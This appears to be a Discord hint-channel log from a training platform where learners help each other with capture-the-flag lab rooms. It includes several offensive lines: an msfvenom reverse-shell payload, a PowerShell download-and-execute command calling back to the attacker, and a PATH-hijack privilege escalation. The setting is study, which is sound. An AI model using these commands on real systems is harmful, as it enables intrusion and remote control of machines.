#room-hints

For question 3?

Yeah, the question asks for a four digit directory

That was question 2

Ah sorry, what bit are you stuck on?

Lol no its fine, I'm stuck on the filename bit, hold on ill send a pic

"What is the filename u found?"

So you have the directory, fuzz it again and inspect element 🙂

Ah ok I've never actually used wfuzz before, time for some research i guess

Don't need wfuzz

gobuster??

I can use gobuster?

Yeah, I'd use gobuster

faster than dirb

Okie

whats your opinion on lianyu room

Yeah, I'd use gobuster
@warm schooner @grand pasture

Really fun room, enjoyed the theme

It's hard cos i never did a CTF room before lol, step up from walkthroughs for sure

i think you are enjoying 🙂

@grand pasture keep it up and you'll do fine 🙂

Yep I'll try 😅

can anyone tell me how to find the ticket in Lian_Yu ?

can anyone tell me how to find the ticket in Lian_Yu ? https://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/
@spark monolith

your medium dictionary can find it

Hmmm, what am I missing to find the SSH username in lean yu 😮

Just completed Lian_Yu, pretty fun box. Anyone needing a push, DM me.

how uch fuzzing does it take

ive been fuzzing for ages

i found the number and the video

i am now fuzzing the t**k**

i have tried all the numbers between 0000 to 9999 , why can't i find something

where are you fuzzing

make sure its the right place

welp nvm

got it

@frosty inlet thanks for that one

anyone doing binex ?

I'm also shortly available via DM for a hint on Lian Yu if you're struggling

@pine ermine there's a hiddem file on the ftp with a short story. Have a look at that to gather names

Yea, I got it shortly after and finished the box. Thanks @stuck fractal !

Could anyone just point for Agent_Sudo steg crack wordlist to use? I just went for the obvious one but still going on....Sorry for jumping directly it's an easy one but frankly speaking I hate brute. Any hints pls?

i have one tiny quesstion about lianyu

can i pm someone

You can pm @frosty inlet

logged into ftp , and now stuck

lian_yu

any hints

@tribal ginkgo ls

Get the files

Look at them

three photos

1 is not working

room:Network Services ...task 4 -->ques 4......i have got th document but its not opening or either downloading......any hints for that pls

@sharp sage what?

in samba i got a .txt file but when i get to it its not opening

https://youtu.be/53zkBvL4ZB4

Need a hint in vulnversity!

Anyone?

@sharp sage file names with spaces are special.

@mystic kestrel you need to tell us where you are before we can give a useful hint

Found /bin/systemctl stands out in SUID. Stuck at the last part.How can i use /bin/systemctl to gain root privileges

Any hints

GTFOBins

@mystic kestrel you can use systemctl with a mktemp vulnerability, GTFObins has a good example

Okay thanks will have a look

@warm schooner not exactly, you just make a service with it whatever way. Either oneshot or a more complex one.

@stuck fractal am giving proper name with proper spaces........but its not opening or downloading at local by get

Spaces seperate arguments

If the file was called my file has spaces.txt you would need to use quotes or escape the spaces

Otherwise the system would think you are referring to my file has and spaces.txt

okie i got it thanku

@stuck fractal

I'm still here. No need to tag me.

Found the GTFObind for vulnversity and copied and tried the code. But couldn’t get it. Help please?

@mystic kestrel research about systemd service files. You need to loosely understand what you're doing rather than copy paste from GTFOBins

Hacking is all about understanding

Will research about it.and try. 👍

the second part of lian yu is much easier than 1st

@frosty inlet I went from user to root in under a minute and I'd never heard of the binary

It's much easier than the initial access

Nice spoiler there 😛

@signal needle not really

yea man took me around 3-4

you are a ninja @stuck fractal

I just know how to read a manpage.

I recommend you learn

yea

i read the manpage

actually i just read the --help

yea man took me around 3-4
that was minutes not hours ahah

after being stuck on the first part for 1.5 hrs

guys stuck on ssh part

room:networl services ..task4--->ques 8.......i got the id_rsa key and user name but its not working

ssh "John Cactus"@10.10.4.32 -i id_rsa
Connection closed by 10.10.4.32 port 22

any help for this

@stuck fractal

Not so sure "John Cactus" will be the username.

@signal needle i have tried all the names James,Anonymous,polosmb but same output i got every time

Have you tried john or cactus?

Ive not done that room so I can only speculate.

yes i have but they are also not working

Let me do the task and ill get back to you.

okie np..:p

@tribal ginkgo what?

@sharp sage it works when you use the correct username

Unix usernames are normally lower case

you might want to stop just pinging mods

there are other people that might be able to help you

Especially if you actually ask a good question

@stuck fractal in lian-yu , logged in to ftp get the images files

Great. The room has steganography as a tag

trying steg tools on the bandit image

not getting anything

Got it, ill PM you @sharp sage

@tribal ginkgo try harder

Hi guys, somebody here to talk about lian_yu. Thx!!!

@fallen sedge Don't ask to ask, just ask

Don't want to spoil about this ctf

Put it in spoiler tags, then.

Completed Lian_Yu! A lot of fun and definitely worthwhile as first CTF for me, very much a beginner btw. Keep at it :)

On the RP:Metasploit Room, I’ve run the reverse TCP handler exploit as a job, which was successful but no session has been created, which is required to move on

Check your settings

Oh

Wait

No. Reread the question

Handler just waits for a connection.

It tells you to change it back

Oh okay

Yep, didn’t read correctly thanks

Could do with a little push on Lian_Yu.|| I've found 2 directories and i'm trying to get the t*c**t. Using gobuster and looking for different ext. Am I on the right tracks?||

Yep

Thanks. I tried the two most common ones I can think of. Maybe I just need to wait it out. 15% thorugh

Its not a standard extension, one of the pages gives you a hint.

oh damn! thanks....I must be half asleep! I'll do that

anyone here with a terminal at hand ?

What do you need @night rivet

can I dm someone regarding some doubts in Lian_yu?

||message|| for spoilers

Can someone give me a hint for Lian_yu as well. || I got FTP access and found an image which at first sight does not seem like a PNG image. Now I converted the first 8 bytes of the file so that it matches a PNG file. But I am still not seeing anything useful. Am I on the right track? I found username already ||

@sick coyote ||Can you view the image now?||

@stuck fractal || I am seeing an image but it consists of blocks only. So I think I am not seeing the right image. ||

@sick coyote ||Did you change the header, or add the bytes to the start?||

I just learned about the bash <4.4 PS4 env trick as well bash <4.2 slash in func name trick. Both are so cool!

@stuck fractal || 1) xxd -p to a binary output. 2) Put in the hex values into https://gchq.github.io/CyberChef/ Changed the bits there. 3) Downloaded the output and I even tried to use the Generate image function from the changed hex values ||

@sick coyote DM me to avoid the spoiler tags constantly?

Can I get a small hint on priv esc for lian_yu? Something that wont spoil it if possible

@hasty gust You know how to list sudo rights?

Yeah, but it asked me for a password. I entered my current pw which failed

@hasty gust It should work

||sudo -l||

thanks i'll try again. Maybe my clipboard got messed up

Probably

yep , it was my clipboard copying/pasting the wrong pw. Thanks

I'm currently working on Task 43 Bonus Challenge - The True Ending I saw a previous hint about looking for a file owned by all the users
I tried using this command but i didn't see anything helpful
find / -user shiba1 -user shiba2 -user shiba3 -user shiba4 2>&1 | grep -v "Permission denied"

@near lotus Not all the users

Do one at a time

and you're redirecting errors into stdout

You can just redirect them to dev null

ok i will try that.

Need a hint for lian-yu, i found and fixed the png. but it doesnt rly help me

@white salmon The room tags include stego

Need a hint for lian-yu, i found and fixed the png. but it doesnt rly help me
@white salmon maybe you should look into different file

i guess privesc part taking a little while since its a "condition" on lian_yu

Need a hint for lian-yu, i found and fixed the png. but it doesnt rly help me
@white salmon ||have you seen what the images you fetched are?||

@potent quail do you mean the filetype? png & jpg. i used binwalk and got a zlib

PNGs are often detected as ZLIB

@potent quail do you mean the filetype? png & jpg. i used binwalk and got a zlib
@white salmon no I mean actually look at what the image is of.

@potent quail do you mean the filetype? png & jpg. i used binwalk and got a zlib
@white salmon did you get the ticket?

Looking for some help with where to get started on this box. I've done some nmapping and gobusting but havent really found anything too useful 🤔

https://tryhackme.com/room/lianyu

Looking for some help with where to get started on this box. I've done some nmapping and gobusting but havent really found anything too useful 🤔

https://tryhackme.com/room/lianyu
@fleet flume Try enumerating harder

@fleet flume Keep go(bust)ing

Gobuster forever basically

@fleet flume try HARDER

@fleet flume try different wordlists

Dirbuster 2.3 medium is what I recommend

youre on the right path. have you found a page? try using that as your initial url with dirb/gobuster

I have found a page, (was gonna mention but dont know spoiler tags on discord

Dirbuster 2.3 medium is what I recommend
@stuck fractal actually its the list you need for all gobuster steps in this box

Yes

I've rooted it

There's a reason I make accurate recommendations

I have found a page, (was gonna mention but dont know spoiler tags on discord
@fleet flume || then your text, then the same again ()

@fleet flume enumerate that piece of land too 😉

Appreciate the advice, i'll keep digging. Wasnt sure if I Was missing some kinda extension search or w/e but i'll plow on

thanks!

the box will tell you when you need exts

i guess privesc part taking a little while since its a "condition" on lian_yu
@viral mason dude.. it was way simpler than this

rooted, great box

@stuck fractal Thank you for the help.

Hi there, not really looking for a hint but have Qs related to Steel Mountain. 1 - I am meant to have to restart the box everytime the shell times out? 2 - I'm unable to restart the vulnerable service, I confirmed it was the right service but it always crashes when trying to restart. Is this normal/expected?

@old pilot Crash with 1053?

Which shell times out?

Metasploit one, if I leave it long enough it times out and the box is still up but the web app (8080) crashes

Also yes crash with 1053, I had previously gotten it to restart tho just had a bad payload but having that 1053 now a lot

So, 1053 means Windows killed the service because the service didn't tell Windows that it started correctly

Because you're generating an exe payload rather than a service payload, it doesn't send that signal

I have a workaround for it, if you'd like

I'm using the msfvenom payload that was suggested, should I use an actual windows service binary?

I have code for one but assumed the suggested msfvenom would work

There's an option for msfvenom to generate services, or I have a workaround that lets you use the exe

I'll see if I can get it working a service first, but what confuses me is that the given msfvenom payload doesn't work or is unreliable?

Some people have said they got it working

But the actual exploit for the unquoted service path doesn't actually work

Or at least, doesn't work for many people

exe-service as the format in msfvenom I think

yep, gonna try that now

The exe-service fixes it 👍

@old pilot The other workaround, which can come in handy, is an option called prepend migrate

This causes the shell to migrate immediately on running.

To a non service process? so it doesn't crash?

because your shell isn't in your payload any more, it doesn't die

You can migrate to spoolsvc etc

It's a standard msf migration

Awesome, will note that for future

I'm admittedly confused. I never had any issues like this.

@patent token Some people seem to, I've had it every time

I wonder why that is.

The unquoted doesn't work for everyone, and if you replace the service binary with a plain binary then Windows kills it because it thinks it didn't start right

It's windows

Where are you placing the poisoned executable? In the path, or outright replacing the executable?

It's probably some ancient code that no one has touched in 20 years

Replacing causes the 1053

I place it in the path and it works ok.

In the path, Advanced.exe doesn't work for everyone

I think we've had this discussion before?

Maybe. I have so many discussions.

😛

anyone doin binex ?

It makes sense in theory because the service shouldn't be executing non service binary but on the room page it gives an explicit non service binary payload to use which is probs just a mistake.

@old pilot I think it works for some people

In that case am more confused because technically it should always crash for a non svc binary 😄 , unless they migrate like you suggested.

I think unquoted service path works correctly with it

Not sure if it runs every binary, or only the first it finds

Still on with https://tryhackme.com/room/lianyu

Have gained ftp access, and noticed one of the images isn't loading. No idea what to do with this information however. Any pointers?

Maybe the image is an image, but the system can't tell

How does the system determine the file type?

can anyone give me a hint with Lian_Yu room exactly the file extension

@glacial ember Which part?

Hi all, new to this thm discord. Having a problem in the blue room where I try to upgrade from a shell session to a meterpreter session it just fails.

Did you set your LHOST?

This happen to anyone else. Any small tip will be appreciated

yes

To your VPN ip?

Show us the error message and what you're doing

I set it to the ip i get from thm

Are you using your own kali VM or the TryHackMe kali VM?

using my own kali as i'm free user

will get error going quickly

And you got the CMD shell with eternal blue already? And then backgrounded that?

Using the same metasploit instance to upgrade?

can anyone give me a hint with Lian_Yu room exactly the file extension
@glacial ember ||the extension is correct, but the computer doesn’t know how to specify the extension as something is wrong.||

@potent quail There's 2 extensions

The ticket, and the file you download from the FTP

Ahhh I forgot about the ticket. I thought he meant the file

@stuck fractal I get the external blue exploit working and a cmd shell yes but I need to get meterpreter and thats where it fails.

here are the errors for shell_to_meterpreter

msf5 post(multi/manage/shell_to_meterpreter) > run

[] Upgrading session ID: 1
[] Starting exploit/multi/handler
[] Started reverse TCP handler on 10.8.11.195:4433
[-] Post failed: NoMethodError undefined method reverse!' for nil:NilClass [-] Call stack: [-] /opt/metasploit-framework/embedded/framework/lib/msf/core/session/provider/single_command_shell.rb:136:in shell_command_token_win32'
[-] /opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/command_shell.rb:774:in shell_command_token' [-] /opt/metasploit-framework/embedded/framework/lib/msf/core/post/common.rb:147:in cmd_exec'
[-] /opt/metasploit-framework/embedded/framework/lib/msf/core/post/windows/powershell.rb:32:in have_powershell?' [-] /opt/metasploit-framework/embedded/framework/modules/post/multi/manage/shell_to_meterpreter.rb:161:in run'
[] Post module execution completed

Metasploit probably just broke

It does that

copying all options if you think I should provide

You can get a meterpreter by changing your payload for EB

@potent quail i'm talking about the ticket

i'll tried this on my peppermint os with metasploit installed directly and windows 7 with virtualbox kali

gobuster

@glacial ember look back at the clue for the ticket - what clued you in that there was a ticket?

@glad helm Metasploit breaks. A lot.

@stuck fractal yeah quite frustrating. I have payload set to windows/x64/shell/bind_tcp

Use a revshell payload

only way I could get shell

didnt work the times i tried before but let me try again now.

@glad helm Run the VPN on the attacker, not the VM host

I've also seen a lot of issues with peppermint OS and msf

AKA all 2 people that I've seen running peppermint OS have had issues

It's likely to be firewall I guess

full ownage @ binex

for Lian_Yu what is the upper cap for the hidden directory? I tried with a list containing numbers upto 1000000. Gobuster just start giving errors after a while

@light dew Directories can be in other directories

You know you're looking for 4 digits

so gobuster with simple directory lists yield something?

Try it and see 🙃

I tried and waited for a while... that's why I am asking!

did you find the 4digit directory?

@light dew dirbuster 2.3 medium list will find everything you need, if you use gobuster right

no, gobuster keeps breaking!

There are alternatives

Or you can fix gobuster

ok

room lian_yu i got the ssh passwd but stuck with user name any hint

?

@sharp sage Enumerate FTP again, it will be found there somewhere. It’s in multiple places, one more obvious than others

thanku @potent quail i got it

finally i completed Lian_yu nice room !

Hey guys! I'm stuck in Lianyu trying get the SSH password.... anyone care to share a non-spoiler hint? I am already on the FTP and know about the other user...

Can anyone offer help with Kenobi?

@shut whale Ask the question, don't ask to ask

@idle storm One of the room tags is steganography

@stuck fractal That definitely helps.... I'll get to it!

Thanks

cool, im trying to get privilege escalation at the end but when I run /usr/bin/menu and choose option 1 it does not execute as root.

'echo /bin/sh > curl' 'chmod 777 curl' 'export PATH=/tmp:$PATH'

@shut whale which curl

@stuck fractal regarding the eb. im running vpn on hacker machine peppermint. reverse_tcp didn't work. Turned off local firewall didn't help either. . now keeps complaining port already in use or unavailable. ran netstat and I see ports listening. changing to a different port didn't work. out of ideas for now.

As I asid

Seen issues with peppermint OS

yeah going to give the kali vm another go. thanks for your assistance.

can I get a little hint on the ftp username form lLian_Yu

You found it

||Codeword probably should have been codename||

getting a 530 on the username

@white salmon Make sure you're getting the password right

People skip the 2 chars at the start

I got a 530 after USER

getting a 530 on the username
@white salmon make sure you’re using the correct username, it’s a little tricky to find

If you’re getting an error on FTP user then the username is wrong

hey there folks, am new to tryhackme, just having a go at lian_yu, got the file with the ssh password, i must have missed something, can't seem to work out what the username is to go with that password. Can i get a hint on user for ssh please?

@edgy widget Ftp, ls -a will list hidden files too

Have a look. Enumerating for potential usernames is important.

i grabbed all the files in there, maybe if didn't read them properly

the .other file maybe

Unix usernames are lower case, pretty much always

||.other_user||

hah, sorry, i am an idiot

Nah

it took me a while

had tried that, missed pasted password 😦

in now thanks

OOF

there's a simpler way to get the username than guessing based on a file

i'd not read the contents properly, then missed last character off my password paste

i prob should have been more thorough, but had a few beers so getting lazy!

interested in your simpler way though, can you let me know?

you can cd in ftp, that can get you information

rooted now, nice simple priv esc 🙂

will go back and look in ftp

thanks for the help

@blazing turtle Ah I assumed I was chrooted

Interesting

i always try cd to interesting places, sometimes it works

hah cd ..

wonder why i didn't try that

👍

will do a writeup for this one as there doesnt seem to be any posted yet on the room

are there any rules?

Don't show flags

No flags / answers / credentials 🙂

Or passwords

ok, so just guidance not walkthrough?

@edgy widget Read some writeups on other rooms

Walkthrough, but don't show answers/passwords etc

👍

i'm entering the comp to get two months free subscriber 🙂

thought i'd do a writeup of a room with nothing yet, rather than just follow one thats already done

i like it here, nice feel to the place, first couple of rooms look fun

thanks for providing so much for free

Glad you're enjoying the content!

been vip on htb for nearly a year, done 50 boxes now, so wanted to find something new

aaa pls hint on willow really long string thing

plz hint for privilege escalation on lian_yu room

List your sudo rights

Then read a man page

thaks got it

Any hint for finding the ssh passwd?

@dusky urchin The room tags include steganography

Ya. was doing that. Coudn't find any leads 🙂

You need to get access to the files on the FTP first

You mean the image files ? Got that

All of them?

Then you have what you need.

Try Harder.

Ahah! I might have missed something.

Thanks btw

🙂

a hello pls help me on those numbers from willow

Elf

What in God's name are you doing?

i don't know

help me

aaa still stuck at numbers thing 😦

@stuck fractal Thanks. Rooted. 🙂

any other tool other than decompyle3 for peak hill? damn thing is not installing properly

always throwing errors

Hey

@viral mason pip3 install

@stuck fractal i already did that

@viral mason https://github.com/rocky/python-decompile3

I new in website try hack me

Thank you for join

@stuck fractal even in "make check" it gives error like this and i couldnt find any solution from issues section on github

@viral mason It's not a c program

So make won't work

dude, i know that its not a c program

So why are you using make?

im surprised as you are, but author gave "make check" for checking the program

Make check is for testing the program

Not for installing it

anyhow, i also tried to do decompyle3 <filename> but its not working

By the title there

i know.

i installed it with above installation guide

You need to install decompyle3 first before you can use it

It works perfectly on kali

setup completed successfully

i did pip3 install -e . and then did python3 setup.py

Then your path is probably not set up to include it

how

It installed it somewhere

should i delete the files in /opt and install it under root?

Just install it like a normal person

pip3 install decompyle3

🙂

So it's installed

You just need to find it

It's not in your PATH so you can't run it by name

normally, if it's not accessible from any other location from it's installed path, it simply throws error like not found. anyways, i tried to execute it from installed location which is under "/opt/python-decompile3" but still not working

@stuck fractal curl is bin/curl

@shut whale Then you haven't faked it right

Thank you!

@shut whale Where did you create your imitation curl?

root directory

@shut whale You shouldn't be able to write to /?

yeah your right

You were meant to create it in /tmp as that's what you added to your PATH

icic

let me give that a spin

btw @stuck fractal i also tried the same procedure like a "normal person" in parrot, it's not working in there either, fyi.

Means your PATH isn't set up for it

It is for me

So it's on your end

what do you mean by PATH spesifically? am i getting it wrong?

Your PATH is where your shell looks for binaries that you call by name

yeah, i get it correct

i'll try to figure out

thanks.

Basically, wherever you installed the program isn't included in the PATH

So you can't call stuff by name

I should have caught that part. Thanks creating my curl in /tmp worked.

can i get a hint regarding lian_yu? I can view the png file but after that i cannot seem to find anything.

@hasty slate One of the tags on the room is steganography

used steghide but didn't seem to get anything. is there any tool for this?

Steghide can require a password.

Steghide primarily works on jpgs.

okay. let me see.

rooted it thanks for the hint!

Hey can anyone help me with lian yu

I figured out the ssh password

But can't seem to figure out the username

@wanton sonnet there's 2 ways

||The FTP server allows you to look around a litte, or there's a hidden file with a short story with a few possible names.||

Rooted it thanks🤦‍♂️

check pleas

??

@brisk nest please, avoid posting advertising links in the future 🙂

Hey im stuck on the network services SMB section,
It mentions
"Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?"
I have connected via smbclient and used enum4linux.
My main problem is im not sure how to view the files i tried to use get to download them but it gives errors.
I'm having trouble downloading the files i need with GET with out errors

Hi, im working on RPMetasploit room. I'm on task 5 and have done the nmap scan, but i didn't find the asked question which is service in port 135. Is this possibly because i used macos?

@scenic bolt check it with
nmap -sV -p 135 <ip>

hello wonderfull people, i currently am kinda stuck on Agent-sudo on task 3, i have found the ftp password for chris, i got the pictures but i can't find the pass hidden on them, i used a python script that utilizes steghide and a wordlist to crack them, still don't know if that's the right aproach. I don't know what to do a hint would be apreciated thanks

SteelMountain Task3 step 1. I got the PowerUp.ps1 (using the link provided) uploaded. Getting nothing but errors when attempting to execute it

@rapid iron Boxes don't have internet access, download PowerUp.ps1 to your machine and upload it to the box from there.

@tidal sedge I used my own kali and did just that

What errors are you getting?

neither the instructions to execute it nor HarmJ0y's instructions work

I repeat myself, what error are you getting?

ERROR: + ~
ERROR: The '<' operator is reserved for future use.
ERROR:
ERROR: At line:208 char:293
ERROR: + ... xt-gray-light">→</span></a></li>
ERROR: + ~
ERROR: The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
ERROR: quotation marks ("&") to pass it as part of a string.
ERROR:
ERROR: At line:211 char:107
ERROR: + ... pt-lg-3">Learn & contribute</h4>
ERROR: + ~
ERROR: The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
ERROR: quotation marks ("&") to pass it as part of a string.
ERROR:
ERROR: Not all parse errors were reported. Correct the reported errors and try again.
ERROR:
ERROR:
ERROR: At line:1 char:1
ERROR: + IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(" ...
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
ERROR: + FullyQualifiedErrorId : AmpersandNotAllowed,Microsoft.PowerShell.Commands.InvokeExpressionCommand

You downloaded HTML

Download the file properly

no, I git cloned the powersploit, then uploaded the ps1 file

via meterpreter upload command

Download the file properly.

Your file contains HTML.

ok, will check it

need a hint on rp tmux room. last task. how to attach to a named session. I use the command from the cheat sheet. and it also the pattern of the answer. also tried it successfully locally in my tmux. but it looks like it is not the correct answer. any hint? NVM, got it. ... really need to learn how to read properly 😁

Hey, I don't think this box is functioning properly.. It isn't accepting pings, or nmap. I've restarted it 3 times and given it around ~10 mins each time to start setting up but still no dice

https://tryhackme.com/room/inclusion

@fleet flume Are you connected to the vpn?

yep, have tried regenerating my .ovpn file and restarting it too

!multivpn

@fleet flume ^

Thank you @tidal sedge Found when I did the git clone it was taking the whole of the page with the code. So I just copied the code and created the PowerUp.ps1 file

ahh, that's sorted it. thought i was going mental

thanks mate

https://tryhackme.com/room/linuxctf "Flag 16 lies within another system mount." I'm looking around using df, mount and /proc/mounts

Nothing is really jumping out at me

Any hints on finding that hash

You're thinking along the right lines

You just missed a possible mount point 🙂

ah i got it

that was a funny one

Really stuck on smb section, I got the id_rsa keys from the smb share and used chmod 600 on the file.
I cant seem to use the key to ssh into server with the key its sayings its to open and unprotected.

I'm struggling on the anonymous box, wondering if anyone can give me a hint for finding the share.
no clue how to do the rest but I'll deal with that when I get to it

@white salmon Your going to have to provide more information, what room is this? Also screenshots would really help.

sorry its the network services room, exploiting smb section

Showing us is better

Screenshots are really helpful

I'm struggling on the anonymous box, wondering if anyone can give me a hint for finding the share.
no clue how to do the rest but I'll deal with that when I get to it
@lean vale Have you ever heard of smbmap or smbclient?

I haven't, pretty new to this

Do some rooms before jumping into challenges

Learn some services

happy to learn though so any resources you can tell me about I'd appreciate
or should I do a different room first

Do some walkthrough rooms

@lean vale Have you done Learn Linux?

which one would you recommend?
yeah

I've done the walkthrough one

@lean vale This is a really good guide that we recommend to most people that are starting out: https://blog.tryhackme.com/going-from-zero-to-hero/

oh cheers

The @stuck fractal It randomly worked whats weird is i was trying the same command for ages i reset the box and it worked...all good

thanks for the link @tidal sedge

will take a look

@tidal sedge @stuck fractal Will upload pictures in the future, got it working thanks 🙂 just had to reset the box.

SteelMountain powershell. To restart a service, you can use the Restart-Service correct?

SteelMountain powershell. To restart a service, you can use the Restart-Service correct?
@rapid iron I believe you use the service

sc stop <service>

@proven bridge 👍

Steelmountain - Finished all the task. Verified all fields completed but only showing 92% complete

disregard. just did not refresh

hey any hints on djin im kinda stuck with spoiler alert : ||my wish|| ?

dm me @white salmon

nwm i done it

oka

i actually feel dumb nwo

There's another one for the picture book! 😁

that feeling when you forget that something exists and can run something else 😛 @inland onyx

that feeling when you realise your nice vegan chocolates contain alcohol and you're driving later 😢

lol

can't get drunk off those tho..

Also can't drive having consumed alcohol 🤷‍♂️

true true

@inland onyx you can. You shouldn't

I mean, is it Murphey's Law or Sod's Law that says the one time I do it is the time I get pulled over?

@inland onyx Oh, scottish limit, yeah

Yeah, genuinely, I think one of those rum truffles would probably put me over the limit

Not complaining though -- I agree with the virtually zero tolerance

I think it should be zero tolerance however, it's annoying if you have had a few on the evening knowing when it's safe to drive the next day. You can make a rought estimate but can't be 100% sure

Hi. Im doing steelmountain room and I have problem with powershell

I've uploaded .ps1 file

loaded powershell

but on powershell_shell command i have this

Please, help

What version of metasploit are you running?

Framework: 5.0.80-dev

Update it, should fix

with apt-get?

Yeah, apt update, then install metasploit-framework

ok, I'll try

thanks

No worries, let me know if it works

sure

works 😄

Awesome

thanks again

@lean vale This is a really good guide that we recommend to most people that are starting out: https://blog.tryhackme.com/going-from-zero-to-hero/
@tidal sedge

That’s a good starting guide for new users. Thanks for pointing this one out 👍

anyone do the Learn Linux room?

@amber violet Don't ask to ask, just ask

ok - i need a hint for the last part - true ending - i see a ".sudo_as_admin_successful" file which i think will let me sudo but it appears to be blank - other than that i'm stuck

sudo as admin successful doesn't let you sudo

Find out what that file means

well will point me in the right direction

the file has 0 bytes of data

is that supposed to be the case?

Yes

that tells me that nootnoot is able to sudo since that file is created upon successful sudo command

Ok, and what are you going to do with that information? @amber violet

i need to find a way to switch user to nootnoot or run command as nootnoot

Look for files belonging to each and every user

yeah i'm hitting a wall here

oh that wall

took me a few hours to stop overthinking it.

Any hints for The Impossible Challenge? I've tried a lot of decoding and some steg stuff, but not really getting anywhere

@ripe hedge you talking specifically about the Learn Linux challenge?

yes

the last task, right?

yeah

been on this for like 2 hours now

look back at the users you have access to and look for anything belonging to them

there's one file that's in an odd location

don't worry it took me a while to realize it as well...like a few hours

then you find what you're looking for and think oh. that was dumb

am i looking outside of the user's home directories?

i'm trying to just use this command: find / user shiba[1,2,3,4]

but it gives me tons of hits

-user*

@amber violet Supress errors

Look one user at a time

yeah

2>/dev/null helps though find probably has it's own flag

I really should read the man page for that

ok this is literally my first experience using linux - am i gonna know something is out of place based on the guidance from the other tasks?

Yes

@ripe hedge - yeah i googled and didn't find a a flag for that

you'll know when you see it

i doubt that at this point lol

haha

Spray and pray

Ultimate strats

am i ignoring these /proc entries from find command?

those are just processes are running right?

yeah those aren't helpful

omg...

i finally got it

all these hours wasted

lol

Trying to use gobuster and I’m in /usr/share but I can’t find word list am I doing something wrong

@unreal geode /usr/share/wordlists exists on kali by default

IDK what you're using

How would I find one

I’m using Kali Linux on a raspberry pi

@unreal geode Find one what?

Chances are that's the minimal image?

IIRC it doesn't come with wordlists, although I might be wrong there

It’s sticky figures Kali pi imagine

I’m just confused on what to type in to get gobuster working

I'm in the same place with that nootnoot root permissions :/

Nvm I’m just stupid

Hi guys, I'm doing the Ninja skills room, actually completed it...besides one small thing, I'm sure it's utterly stupid but what file has 230 lines since none of those files have 230 lines?

I’m just confused on what to type in to get gobuster working
@unreal geode usually I just use dirb

ok - i need a hint for the last part - true ending - i see a ".sudo_as_admin_successful" file which i think will let me sudo but it appears to be blank - other than that i'm stuck
@amber violet it's just because that user is allowed to use sudo as admin. Try with a sudo -l to see what you can do with that user

hey am doing skynet room .......now in that room i got the password for milesdyson share but when am login to share of milesdyson am not able to login to his share

Hi all. I'm trying to "
Find flag 26 by searching the all files for a string that begins with 4bceb and is 32 characters long."

find / -type f -size 32c 2>/dev/null | xargs grep 4bceb

^ I'm trying something like this to no avail

maybe the first line is only 32 but the file is longer. Is there a grep for only the first line?

So I tried this:
find / -type f 2>/dev/null | xargs head -n 1 2>/dev/null | grep "4bceb" -a 2>/dev/null

"grep: memory exhausted"

There has to be a cleaner way to do it

I tried writing head out to a file and maxed out the drive... that's no good either

I have got the root access in Lord of Root CTF but unable to recognise what's the name of the method ie Question 6

Yea, I'm stuck. I went with a hail marry and just grepped whole files. It worked but I didn't get a hash that I was looking for.

find / -type f 2>/dev/null | xargs grep "4bceb" -a 2>/dev/null
/var/lib/dpkg/info/xubuntu-icon-theme.md5sums:cd323465582c0d4bceb022e2e2756b60 usr/share/icons/elementary-xfce/panel/48/nm-device-wired.png
....

@velvet wharf room name?

https://tryhackme.com/room/linuxctf

Task 4 #7

u are looking for flag 27 right?

@velvet wharf

no

flag 26

okie le me see

Thank you

u can use grep with ^[0-9 a-z]{size} ....^[] this specifies the starting of your words and then 32 bit thats your file

Thanks let me try that out

Hey, I might be being a bot but i cant find flag 15 in Linux challenges. I've tried cat /proc/version, uname -r and hostnamectl but none give me a key. any tips?

There's more places

Check the hint

Thanks, I found the flag 👍. I saw the Asterix and thought it was a word correction so ignored it initially.

am bot

Could I get a slight hint for priv esc on Gatekeeper (I have user)? Like is it straight forward enough or do I need to dig for a bit.

Can anybody provide some hint for Lord of the root priv esc... i have got the suid file but not able to figure out the priv esc

@fallen dragon bof

I'm doing Alfred room and I would like to use no meterpreter reverse_shell
I'm using this command in jenkins: powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.8.166:85/nometa.exe')
And nc -lvnp 9006 for listening
Nothing happened on nc
Any ideas why?
Please help
And this is my payload:
msfvenom -p windows/shell/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.8.166 LPORT=9006 -f exe -o /home/hacker/TryHackMe/Alfred/nometa.exe

@rose root %27 in your URL?

And you're not actually running the shell you downloaded

You're just downloading it

powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.8.166:85/nometa.exe'); Start-Process "nometa.exe"

something like that?

you're in hints

so give me a hint - Am I going to rigjt direction? 😛

becouse this command doesnt work

@rose root it might be worth trying to learn what each of the commands do which will help you get a better understanding when things aren't going right

I think I know

first downloads exe file

and second start this file

Before trying to start the process check that it has actually been succesfully downloaded

do you mean &&?

PM me if you need more help with your command(s)

Hey all, im stuck on Advent of Cyber at task 18. I have found the wordpress creds for Wade but i don't know what to do at this point. I tried multiple exploits with msf to get a shell but non of them work. So i ended up editing the themes code and uploading a webshell. I can run commands but i can't access the user folders so i can't find the first flag. I don't know if what im doing is the right aproach. A hint to the right direction would be apreciated 😃

@white salmon RDP, log in.

Credential Reuse.

Thanks

ah this may be a better room to ask help for than general...

For room hints, yes

So doing the very first task where i need to do a nmap to find version of the software running on port 22

99% sure the command is okay, but i get no version.

Connected to the VPN?

Drop your machine IP and I'll see if I can

If I can, it's a VPN issue

oh that i am not.

not connected to vpn at all 😄

Connect to the TryHackMe VPN to access 10.x.x.x IPs in rooms

ah thats it then.

If you're having some issues with the scan, and you know you're connected to the vpn, add on a -Pn to your nmap scan since you know it's already alive.

yeah i was doing -Pn already to actually solve something previous 😛

Saved me the other day from banging my head against the wall

But do make sure your VPN is working first.

says im connected on the site now.

but still not sure its working.

Don't trust the access page

Like, ever.

best way to actually test then?

openvpn also says connected.

!vpn

||PORT STATE SERVICE VERSION
22/tcp filtered ssh

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.46 seconds||

thats what i get still.

